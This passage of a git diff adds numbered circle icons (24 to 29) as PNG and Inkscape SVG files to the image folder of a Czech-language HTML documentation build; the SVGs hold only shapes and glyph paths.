0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/24.png b/tmp/cs-CZ/html/Common_Content/images/24.png
new file mode 100644
index 000000000..863ce3b66
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/24.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/24.svg b/tmp/cs-CZ/html/Common_Content/images/24.svg
new file mode 100644
index 000000000..27e1d39c9
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/24.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/25.png b/tmp/cs-CZ/html/Common_Content/images/25.png
new file mode 100644
index 000000000..cc23b9b2b
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/25.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/25.svg b/tmp/cs-CZ/html/Common_Content/images/25.svg
new file mode 100644
index 000000000..114e1a26b
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/25.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/26.png b/tmp/cs-CZ/html/Common_Content/images/26.png
new file mode 100644
index 000000000..583fe3486
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/26.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/26.svg b/tmp/cs-CZ/html/Common_Content/images/26.svg
new file mode 100644
index 000000000..e9b5d239b
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/26.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/27.png b/tmp/cs-CZ/html/Common_Content/images/27.png
new file mode 100644
index 000000000..d1c3dfa45
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/27.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/27.svg b/tmp/cs-CZ/html/Common_Content/images/27.svg
new file mode 100644
index 000000000..4a80177b6
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/27.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/28.png b/tmp/cs-CZ/html/Common_Content/images/28.png
new file mode 100644
index 000000000..f5db74735
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/28.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/28.svg b/tmp/cs-CZ/html/Common_Content/images/28.svg
new file mode 100644
index 000000000..d453f299f
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/28.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/29.png b/tmp/cs-CZ/html/Common_Content/images/29.png
new file mode 100644
index 000000000..9a3141ec4
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/29.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/29.svg b/tmp/cs-CZ/html/Common_Content/images/29.svg
new file mode 100644
index 000000000..04b5c5034
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/29.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 